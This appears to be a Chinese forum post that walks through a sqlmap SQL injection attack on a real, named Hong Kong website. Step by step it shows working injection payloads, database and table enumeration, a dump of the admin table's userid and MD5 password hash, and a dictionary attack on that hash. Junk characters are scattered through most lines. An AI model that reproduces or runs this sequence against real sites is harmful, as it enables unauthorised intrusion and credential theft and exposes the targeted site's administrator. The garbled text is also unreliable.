D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 F" R" Q5 G6 K) ^3 b1 I. Oms "Mysql" --current-user /* 注解:获取当前用户名称
& a" B# }2 m& O' {% H% K0 X sqlmap/0.9 - automatic SQL injection and database takeover tool
' X, K. |' e6 S$ U+ E; H# z http://sqlmap.sourceforge.net starting at: 16:53:54
2 K# [9 C( f* q. r[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
7 I, _# a H% G2 n1 I+ L session file7 {. Z v8 W! @
[16:53:54] [INFO] resuming injection data from session file
& c; V) j0 i4 m$ K9 S6 |4 H[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file# Q! J( r2 y( B8 H/ ~ H" o
[16:53:54] [INFO] testing connection to the target url' R# E1 c, M6 x: ?* R6 d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque! k! O4 f0 Y% Q9 l3 v2 Z( [! `
sts:
/ W0 V. K0 j8 n1 i a8 b8 L---; v" V; h- B# N5 c; M7 ?) O
Place: GET$ ?/ {/ t# c/ G$ B$ v! X
Parameter: id6 }( E& ^5 D o0 T! f/ r
Type: boolean-based blind7 [$ G. T. ?1 l3 d7 L7 n8 B
Title: AND boolean-based blind - WHERE or HAVING clause
% q4 h+ f) I! V: h; d6 w Payload: id=276 AND 799=799$ ~& S3 b3 |9 F4 N: P- l% S% L
Type: error-based! g. p ~5 f8 R$ y' W# B! W
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
# {+ a2 n5 Y$ [6 \# S3 E1 f Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% c# ~6 a0 l8 Z, F) D
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 f: j' C* y! V% ?) [/ K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 b8 Q$ A7 b0 W" }( N5 i: [ Type: UNION query
9 ?$ Y' e" L- l3 E4 T f Title: MySQL UNION query (NULL) - 1 to 10 columns8 z4 n* Q ?( T" p1 G$ o2 n7 I
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( W' a; v" ]1 Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 b' w! C$ O% O5 m4 ~% m6 q1 g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#1 d% ], c2 _5 x) y0 M
Type: AND/OR time-based blind
, L4 R" n z ]5 J Title: MySQL > 5.0.11 AND time-based blind
! q. h$ d% ^* ^- {6 X0 f Payload: id=276 AND SLEEP(5)6 i2 ?8 s# Y4 ^8 r9 D
---
/ z% u* y6 c: E[16:53:55] [INFO] the back-end DBMS is MySQL
- ^# U% u* h' o% b0 F7 y7 s) B+ Lweb server operating system: Windows
( c( u. t: {) j: Zweb application technology: Apache 2.2.11, PHP 5.3.00 ~- ]% U& v& J5 M
back-end DBMS: MySQL 5.0, F5 x9 V! Y) ? q
[16:53:55] [INFO] fetching current user1 A1 c6 g% r9 L, ^7 N
current user: 'root@localhost' & O, y! {' Z( w9 p! u
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou0 `. b) W1 f+ u. S3 F4 P
tput\www.wepost.com.hk' shutting down at: 16:53:58
& Q( ]6 o; w7 Y/ D3 ^8 D4 r' ~& f3 ?) m
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ ~! @/ D# c! t V, e
ms "Mysql" --current-db /*当前数据库/ I8 s, H1 s7 l) x$ Y
sqlmap/0.9 - automatic SQL injection and database takeover tool+ x* N. E0 X; I: s. o
http://sqlmap.sourceforge.net starting at: 16:54:165 X9 ^; S, O! z! s* a
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" l- o# y3 q# w& u9 G1 ?
session file$ l f$ k* B7 C+ a' z
[16:54:16] [INFO] resuming injection data from session file2 W( R' p6 K$ ^; f: _4 w% h
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' t+ P- }' b+ L( R G
[16:54:16] [INFO] testing connection to the target url
" V" r: o: K% Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque# N) N: y: s$ }% ~/ Y& S
sts:8 e# G \; J9 F1 k! A3 X& a
---/ d5 N; ~5 @) u* H; f) y
Place: GET. l& o4 h7 W% A1 C
Parameter: id
6 G3 r& U: W5 i4 ^ Type: boolean-based blind0 d/ e7 q& W l u% r
Title: AND boolean-based blind - WHERE or HAVING clause2 C( W7 A1 {: h
Payload: id=276 AND 799=799
. {8 d* t$ ? N( f x4 ?* D Type: error-based
: s8 @" E& t5 ~ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 K1 H5 L4 S+ a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* {8 M2 F4 L' f1 v: O* o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 b! ^9 U0 A! I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& @, p6 l5 h2 A, }2 E
Type: UNION query
0 h! L9 q4 f5 Q' ]" Y, m- s/ ] Title: MySQL UNION query (NULL) - 1 to 10 columns
, J6 G, i0 ~5 J9 F" G0 w0 o9 ^ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 x6 D0 _: S# ^( R, M(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( X( ~" C4 R/ T' e1 X
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. F* M6 o% @ i: ]2 c3 t
Type: AND/OR time-based blind
% A( l! c7 ?- ?7 D& D5 Y! b Title: MySQL > 5.0.11 AND time-based blind/ N1 J" f F8 x6 S1 J) k
Payload: id=276 AND SLEEP(5)
5 M% z/ F$ {5 e/ D" N5 N6 y---
0 L K' S D; |# \& o[16:54:17] [INFO] the back-end DBMS is MySQL- E7 i# u# A2 u1 I% K7 |$ L$ q& M
web server operating system: Windows* m) |5 P$ R: b& d/ B7 E
web application technology: Apache 2.2.11, PHP 5.3.02 [" p( V) b( u7 L5 Q, {
back-end DBMS: MySQL 5.0
2 Q2 c( _2 X2 n[16:54:17] [INFO] fetching current database7 h }: u! H' a8 e0 L
current database: 'wepost': T8 J% q5 C- X$ X, [/ _/ G& j
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& t5 H6 I, J1 @' G$ xtput\www.wepost.com.hk' shutting down at: 16:54:18
6 r- ]4 _! e: \# L, VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 Q" a( t Q( y; w, Ums "Mysql" --tables -D "wepost" /*获取当前数据库的表名
l( h& E! H I2 }% s3 { sqlmap/0.9 - automatic SQL injection and database takeover tool+ i7 d. [' w1 `7 o& Y" L" L
http://sqlmap.sourceforge.net starting at: 16:55:255 [2 Q0 V# h8 Q$ e' n: L
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 Y, x$ `6 g* s) F/ B. [9 l0 @/ ~
session file; _) j5 v: l& m; ~7 f9 b
[16:55:25] [INFO] resuming injection data from session file
/ i9 s- c# s& M9 U[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- n3 z7 ~% A& n8 Q+ e, V[16:55:25] [INFO] testing connection to the target url4 w8 p- K: `. m7 F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 ]: E! Z, u1 b" {/ N& E
sts:
5 z$ `7 F5 @+ ~2 A! g+ T---) X" |9 @3 X/ @- N( C* J& s2 i' s
Place: GET
& @8 `3 n4 i; t" h; O3 YParameter: id! i6 g" w+ A$ x& c* H" `+ R% J4 M+ @
Type: boolean-based blind* q/ [$ Y( B( L! B4 B8 D
Title: AND boolean-based blind - WHERE or HAVING clause" O7 A- g. @6 |2 p+ ~
Payload: id=276 AND 799=799
- M( [( n. b& ?2 a' v2 \ Type: error-based
0 X y( v* U% Z: q: G) f0 T# f Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ i; o* F; x7 z8 o% g, q- [
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 x: q# {% _$ E120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 c0 q+ b+ O* B$ L9 Q- y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ h, {7 V, H& G5 C4 W7 u8 C# W+ G
Type: UNION query
, e; u+ u" q2 W6 }! k" a9 P; h Title: MySQL UNION query (NULL) - 1 to 10 columns
# \8 ^5 h0 Y+ }: T* Q V3 y8 v Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ l6 g# `# g/ K& T% J# A
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- D" q& ]! V. T" Q2 [3 Y8 _
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ Z$ I+ z# m1 s
Type: AND/OR time-based blind
' T6 [$ V; B; g1 u* [ Title: MySQL > 5.0.11 AND time-based blind
0 g0 Q" S$ v- K' J7 V" G/ s Payload: id=276 AND SLEEP(5): B9 F. j& {* D# D) ~
---
1 ]2 D. I; }7 a' r: f$ @2 B( `6 X[16:55:26] [INFO] the back-end DBMS is MySQL
5 `2 q! }- t& yweb server operating system: Windows
7 e4 {% ^$ y. L' yweb application technology: Apache 2.2.11, PHP 5.3.0! B% V, d) Q2 J4 t/ h/ S8 |
back-end DBMS: MySQL 5.0
0 A! ^8 a1 n$ \- m[16:55:26] [INFO] fetching tables for database 'wepost'
) P: D4 X# f+ h- k0 L) g y% t4 A[16:55:27] [INFO] the SQL query used returns 6 entries2 c0 K" R- `- ?5 n6 z
Database: wepost
h) i9 F6 y5 A1 x[6 tables]
5 O' m" y( c$ m% p+-------------+
+ Z% j8 t; R( t8 M9 n| admin |
, y! L9 @6 c( P3 c| article |3 C, M- F0 b: Y. s3 C/ v4 }* g' c
| contributor |. F0 q# _; Y6 Z/ C" U
| idea | d0 H5 @4 T w; F8 }7 T
| image |/ a( d; I& T& S% a8 E6 d7 K+ z
| issue |- R4 w% {' k9 o% k3 @! v8 h* {: `* e4 t
+-------------+3 n5 Z% w) a+ |2 O$ t- g
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou) x3 x% d F6 b9 G2 R# I
tput\www.wepost.com.hk' shutting down at: 16:55:33' F9 L0 F1 x6 I) K* F) h3 N
! w5 t# v& T- d% j2 W+ TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ o0 R8 a4 V( U* Cms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
( i5 h( Y1 |7 z4 g sqlmap/0.9 - automatic SQL injection and database takeover tool$ s5 p; r) e# a! j, D
http://sqlmap.sourceforge.net starting at: 16:56:06
' ~% z" y" x; g* d4 k* @0 ^( jsqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 H$ V# b3 j& c* \sts:
_/ J: l7 a- C( x/ L( P---: Q. C5 b+ u3 `2 q
Place: GET
5 m6 a, ?+ W1 ?$ L. iParameter: id
5 d) h- B; M5 V6 S Type: boolean-based blind. R% E9 ]) i, m: i3 F6 N
Title: AND boolean-based blind - WHERE or HAVING clause
# \, R ]+ X4 \( j Payload: id=276 AND 799=799" X1 {# U* u6 c( ^
Type: error-based( y( _. y! w# X( i
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ \, E: Q% l& g6 R2 F# E) a Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) X# D% r8 U$ c, h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 s2 x5 @: U3 f- f/ A
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! R$ G% k5 Y" M, N0 ~5 ?% t/ h
Type: UNION query K. c6 r( x. \9 \# x, U
Title: MySQL UNION query (NULL) - 1 to 10 columns
2 K8 M! M* g1 c. g Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) J% _- M( i! L, M& m! f* d8 L
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* J2 i+ ^/ Z) l5 j. a8 w }9 RCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 `$ E* k, A" G
Type: AND/OR time-based blind7 R0 p5 X: I4 Y$ N
Title: MySQL > 5.0.11 AND time-based blind
/ x+ \' h2 u4 x/ q. [' H9 m Payload: id=276 AND SLEEP(5)
1 q/ }+ f2 e: s---9 I1 l! }9 \7 n0 h
web server operating system: Windows l8 d. M1 F0 D+ ^# B( H) ^
web application technology: Apache 2.2.11, PHP 5.3.0
p; _2 l& y2 T7 R3 B4 ?# N7 r" Oback-end DBMS: MySQL 5.0
$ t- H( c( D- p- G4 Q% o[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
9 s" ~. f% k0 L+ w J9 ^ssion': wepost, wepost
) M$ s; h5 A% y4 t; e- E5 X" RDatabase: wepost
! p1 w2 J. T1 ~& x, QTable: admin
6 N/ |. c7 A8 S2 W1 }$ V. V[4 columns]
% w! G5 t) Y8 X+----------+-------------+
, ]1 V9 V! ^$ T| Column | Type |. F) m* ^9 n: Q
+----------+-------------+3 `/ u$ S8 Y. U/ O6 f
| id | int(11) |0 c& b8 B% D4 r8 [1 X* e+ j
| password | varchar(32) |
5 L$ B; w2 D/ u, x3 v/ a0 d/ q' H| type | varchar(10) |
% x+ L1 a( a, N+ u2 k" U| userid | varchar(20) |* q" Y8 u) u% J% a7 v! P
+----------+-------------+
/ t, n1 C7 K7 w& b7 v5 \/ X* c shutting down at: 16:56:19
! V! z8 i+ n2 {+ W: r& I, D5 g" y2 Z5 X0 I9 I# c5 Q R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db E1 Z i# V) E4 C/ O6 F8 o: Y2 c
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容- C1 T! T# w. y, o( B4 h
sqlmap/0.9 - automatic SQL injection and database takeover tool
8 v: ^# ~- G) L& Y7 k/ ] http://sqlmap.sourceforge.net starting at: 16:57:14$ y+ L( i% L( x) A7 z+ M
sqlmap identified the following injection points with a total of 0 HTTP(s) reque% c+ W' D# i" Z, [* Z
sts:
% e1 g, H5 S# k7 w---' g2 E e$ N1 Q) @3 ^
Place: GET% g8 F6 x6 ~( F) T% Z6 A# s7 w) Y, M9 L
Parameter: id
' O3 x% i9 ?1 H3 `" q! H1 X Type: boolean-based blind- x' f# k& N0 s0 g9 Z9 Q
Title: AND boolean-based blind - WHERE or HAVING clause
. d6 n' V8 ^1 r6 J1 t Payload: id=276 AND 799=799
0 ?" {5 n( o' u Type: error-based1 {( N( Y, H' X- E
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) M- ]4 m* B6 [, |$ G1 C) e
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 l. w: K! Z( C; E120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. i% ~1 X' ^: o$ D0 j. [! U),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 e3 x4 T+ q( C: j' c7 g% {, ^5 f
Type: UNION query* K2 \6 e) S$ k7 J& i1 y
Title: MySQL UNION query (NULL) - 1 to 10 columns/ T( b8 \# d8 r1 s9 i: m
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( d! Z6 W( P2 H0 J5 q( n2 x; {; X(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: _5 |# Z7 u( a/ v' ]+ A/ @/ vCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) e0 v0 T* ]4 C/ c& _" \! N$ B
Type: AND/OR time-based blind% F& `5 d9 I8 P2 d0 d: F
Title: MySQL > 5.0.11 AND time-based blind* B' S4 f/ X, c1 r! m0 I
Payload: id=276 AND SLEEP(5)/ E }7 j2 Y% K8 ]) @
---* A3 O" O* |# s3 x& q
web server operating system: Windows- Y- k: D8 b3 j2 }( N2 f( n$ t
web application technology: Apache 2.2.11, PHP 5.3.0
! I6 l4 R. w( `' y1 p" U# u6 [$ Kback-end DBMS: MySQL 5.0
; r$ b# A! B8 |5 p6 R4 y- vrecognized possible password hash values. do you want to use dictionary attack o' {4 w- P6 L& K) L. ~
n retrieved table items? [Y/n/q] y
6 ~: G) [9 C, R2 o2 I$ pwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]% d R! m# X+ L, b
do you want to use common password suffixes? (slow!) [y/N] y
- g" t' c' e4 @2 dDatabase: wepost' G# q0 [6 n; b* X
Table: admin9 X2 q+ Z0 q& L" R% ^; O
[1 entry]
" z" S% U' g, ]7 b+----------------------------------+------------+
: F3 G; S. W% z. s! q8 x6 J: U) A" D| password | userid |. D# e4 s, ?) z
+----------------------------------+------------+
# X; H) `8 l+ O; z$ n| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |0 w( u1 g% g9 W- m& }
+----------------------------------+------------+
0 s/ m2 P4 v' B) ~8 |# s shutting down at: 16:58:14# {4 U8 G+ L8 J/ V ^. h& h
' w7 d. h/ O. t, i9 x) U. h
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对